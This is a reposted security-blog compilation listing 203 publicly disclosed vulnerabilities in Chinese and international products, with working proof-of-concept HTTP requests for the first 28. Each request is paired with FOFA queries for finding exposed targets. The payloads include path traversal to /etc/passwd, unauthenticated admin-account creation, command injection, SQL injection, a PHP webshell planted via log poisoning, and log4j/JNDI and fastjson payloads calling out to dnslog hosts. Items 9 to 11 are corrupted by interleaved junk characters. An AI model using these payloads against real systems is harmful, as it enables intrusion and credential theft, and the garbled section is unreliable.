Compilation of Publicly Disclosed Internet Vulnerabilities, 202309-202406 (repost)

Posted on 2024-6-5 14:31:29

道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities makes up a large share of real-world attacks; we hope this article is of some help to defenders, who can use its contents to check their own exposure.

Sources: This article covers 203 PoCs for high-severity vulnerabilities disclosed domestically and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the internet and compiled for publication by the 网络安全新视界 team.

Patches: All of these vulnerabilities are already public; for patches or remediation guidance, contact the product vendor.

Content: Owing to length limits, a few PoCs that are too long have been replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: If any content infringes a party's legal rights, contact the 网络安全新视界 team through the backend to have it removed.

Statement:

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if it is useful to you. You can also follow this public account (网络安全新视界).

01 Table of Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical picture archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. Lean value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

02 PoC List

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin panel with the default account admin, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

" F0 H& ]& M7 o9. 稻壳CMS keyword 未授权SQL注入* u  }' I: ]) K# u  {- t3 t; G
FOFA:app="Doccms"
( B( R% n3 u/ _$ g) OGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
6 ^- g8 G4 u0 w6 q" Q0 D: zHost: x.x.x.x
$ ]* G7 U. E" W8 C
, ~0 _) s- |# u1 x0 K+ {1 V; k- y, S( ]2 O' j+ I; a
payload为下列语句的二次Url编码; m; F6 t& x3 P+ _  D! D
# u( s) ]; X  f& [# _1 d! s
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
4 ~2 ]6 U4 {# a( o( T, m- o% c& L9 ^  X6 U+ f9 {. o4 ~
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
8 M) ^9 \4 H& S. Q$ pFOFA:icon_hash="953405444"$ C8 o3 J" P' j8 l' j+ C$ s- C
7 Y; b/ {. N; l, I( P* i0 h  j
文件上传后响应中包含上传文件的路径, S5 v# }9 e+ ?) t
POST /eis/service/api.aspx?action=saveImg HTTP/1.1+ W) Z0 f0 [6 g/ c
Host: x.x.x.x:xx
! \& i: G, S7 \) A7 [/ X% a( RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36# t& @# `1 ^4 [6 c
Content-Length: 197$ K6 n. ~0 l# }# A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 ~6 [5 f9 S  u. f, G9 D5 J
Accept-Encoding: gzip, deflate
1 [+ B0 D- |1 P6 g, M6 m3 M: PAccept-Language: zh-CN,zh;q=0.9
/ U/ s+ Y5 c0 ]* iConnection: close
' m7 w: f3 ~) h1 l' p. BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu3 Y6 P; w/ b0 l" F$ |: a

: @3 n5 C& `4 \6 p- U------WebKitFormBoundaryxdgaqmqu
+ u- t$ {( U+ m+ M+ N! J( [% a) U$ rContent-Disposition: form-data; name="file"filename="icfitnya.txt", j+ ?4 S, a! X
Content-Type: text/html6 p8 A. a( F" N$ J1 d% W4 [$ X
# T5 F  L. I8 z8 n6 A7 R1 j; F
jmnqjfdsupxgfidopeixbgsxbf9 g4 {/ e: ]7 B! U
------WebKitFormBoundaryxdgaqmqu--
, C# Y3 e3 ^& V- y( F0 \3 F! M$ }- O6 }" @. V4 n
0 k- c2 R: U7 j, J+ y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入) ?3 \( j+ X' b3 ~' n
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
( J+ G( Z8 [. g7 V2 U; FGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1" d" }- A& h8 k2 Y3 ~3 \) w
Host: 127.0.0.1; S9 n9 q. x$ d' M
Pragma: no-cache
- V5 J0 k7 A* b3 f9 cCache-Control: no-cache
0 k3 t  m0 ~" U  kUpgrade-Insecure-Requests: 1) S; q/ |7 ^5 V- Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( [( m+ }$ |/ Y& Q( O, g! X5 N+ S; CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 x2 E! P1 B4 o$ a" a4 f  ^; dAccept-Encoding: gzip, deflate
1 f3 l! s- Z7 t6 E+ m  Z; {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8! _9 t; @6 _1 i$ Y  S) O
Connection: close" d3 E0 u" \6 E8 f  i

3 T8 {4 U  K7 f4 v6 F: E$ q( `1 b4 p: o* s' G) u# a; f
12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: first obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request: it executes the function and applies base64 encoding.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the target lab to execute the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

